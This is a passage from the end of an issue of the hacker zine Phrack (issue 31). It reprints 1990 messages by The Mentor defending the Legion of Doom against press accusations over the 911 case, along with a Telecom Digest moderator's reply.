  3566. lines are all tapped until proven otherwise.
  3567. There is some question to the wisdom of leaving the board up at all, but I hae
  3568. (have) personally phoned several government investigators and invited them to
  3569. join us here on the board. If I begin to feel that the board is putting me in
  3570. any kind of danger, I'll pull it down with no notice - I hope everyone
  3571. understands.
  3572. It looks like it's sweeps-time again for the feds. Let's hope all of us are
  3573. still around in 6 months to talk about it.
  3574. The Mentor
  3575. Legion of Doom!
  3576. [Phoenix Project has been down for some time now.]
  3577. ---------------
  3578. Newsgroups: comp.dcom.telecom
  3579. Subject: The Purpose and Intent of the Legion of Doom
  3580. Message-ID: <4248@accuvax.nwu.edu>
  3581. From: anytown!legion@cs.utexas.edu (Legion of Doom)
  3582. Date: 22 Feb 90 04:42:04 GMT
  3583. Sender: news@accuvax.nwu.edu
  3584. Organization: Anytown USA
  3585. Approved: Telecom@eecs.nwu.edu
  3586. X-Submissions-To: telecom@eecs.nwu.edu
  3587. X-Administrivia-To: telecom-request@eecs.nwu.edu
  3588. X-Telecom-Digest: Volume 10, Issue 121, message 4 of 5
  3589. Lines: 51
  3590. [Moderator's Note: This anonymous message came in the mail today.  PT]
  3591. Well, I had to speak up. There has been a lot of frothing (mostly by
  3592. people who believe everything that they read in the paper) about
  3593. Legion of Doom. I have been involved in the group since 1987, and
  3594. dislike seeing irresponsible press concerning our "plot to crash 911"
  3595. or our "links to organized crime."
  3596. LOD was formed to bring together the best minds from the computer
  3597. underground - not to do any damage or for personal profit, but to
  3598. share experiences and discuss computing. The group has *always*
  3599. maintained the highest ethical standards of hacker (or "cracker," as
  3600. you prefer) ethics.  On many occasions, we have acted to prevent abuse
  3601. of systems that were *dangerous* to be out - from government systems
  3602. to Easter Seals systems.  I have known the people involved in this 911
  3603. case for many years, and there was *absolutely* no intent to interfere
  3604. with or molest the 911 system in any manner. While we have
  3605. occasionally entered a computer that we weren't supposed to be in, it
  3606. is grounds for expulsion from the group and social ostracism to do any
  3607. damage to a system or to attempt to commit fraud for personal profit.
  3608. The biggest crime that has been committed is that of curiosity. Kim,
  3609. your 911 system is safe (from us, at least). We have been instrumental
  3610. in closing many security holes in the past, and had hoped to continue
  3611. to do so in the future. The list of computer security people who count
  3612. us as allies is long, but must remain anonymous. If any of them choose
  3613. to identify themselves, we would appreciate the support.
  3614. I am among the people who no longer count themselves as "active"
  3615. members of the group. I have been "retired" for well over a year. But
  3616. I continue to talk to active members daily, and support the group
  3617. through this network feed, which is mail-routed to other LODers, both
  3618. active and accessible.
  3619. Anyone who has any questions is welcome to mail us - you'll find us
  3620. friendly, although a bit wary. We will also be glad to talk voice with
  3621. anyone if they wish to arrange a time to call.  In spite of all the
  3622. media garbage, we consider ourselves an ethical, positive force in
  3623. computing and computer security. We hope others will as well.
  3624. The Mentor/Legion of Doom
  3625. legion%anytown.uucp@cs.utexas.edu
  3626. [Moderator's Note: As an 'ethical, positive force in computing', why
  3627. can't you sign your name to messages such as the above?  Usually I
  3628. don't even consider anonymous messages for publication in the Digest;
  3629. but your organization has a perfect right to tell your side of the
  3630. story, and I am derelict if I don't print it. Real names and
  3631. addresses go a long way toward closing credibility gaps here.  PT]
  3632. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3633.      There you go.  It's over now, forget it and move on.  Nothing more to
  3634. report on the subject that hasn't been printed, typed, spoken, or heard in the
  3635. last couple of months.
  3636.  
  3637. _______________________________________________________________________________
  3638. Phrack 31 -  .end
  3639.  
  3640.  
  3641.  
  3642.